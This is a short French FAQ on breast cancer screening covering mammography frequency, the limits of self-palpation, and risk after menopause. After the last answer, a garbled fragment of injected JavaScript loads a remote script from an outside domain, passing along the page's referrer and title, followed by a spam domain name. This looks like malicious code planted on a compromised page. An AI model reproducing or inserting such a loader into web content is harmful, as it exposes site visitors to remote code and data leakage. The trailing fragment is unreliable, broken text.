Questions – Réponses

Une mammographie régulière est-elle indispensable ?

OUI : Même si vous avez précédemment effectué des examens révélant un résultat tout à fait normal, une mammographie réalisée dans le cadre d’un suivi régulier permet de détecter une tumeur débutante de très petite taille et qui sera ainsi plus facile à traiter.

A quel rythme ?

Le bon rythme d’examen est fixé à 2 ans selon les experts européens.

Et si vous avez déjà effectué un examen de dépistage du cancer du sein ?
Vous êtes bien sûr invitée à bénéficier vous aussi des « rendez-vous santé + » dans les 2 ans suivant votre dernier examen. Parlez-en à votre médecin traitant pour plus d’informations.

Une palpation suffit-elle à détecter le cancer du sein ?

NON : L’examen des seins par palpation est important mais il ne permet de détecter des tumeurs que lorsqu’elles sont visibles ou palpables. Il est donc insuffisant. En effet, un cancer du sein met en général plusieurs années à se développer sans le moindre symptôme : pas de grosseur, aucune douleur. Seule la mammographie permet de déceler les anomalies non détectables par palpation.

Toutes les femmes sont-elles concernées par le cancer du sein ?

OUI : Chaque femme peut développer un cancer du sein même si personne dans sa famille n’a eu ce problème.

Y’a-t’il un risque de cancer du sein après la ménopause ?

OUI : Et il est accru : 2 cancers du sein sur 3 se déclarent chez les femmes après la ménopause, celle-ci survenant autour de 50 ans.

}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; topspyapps.nettopspyapps.net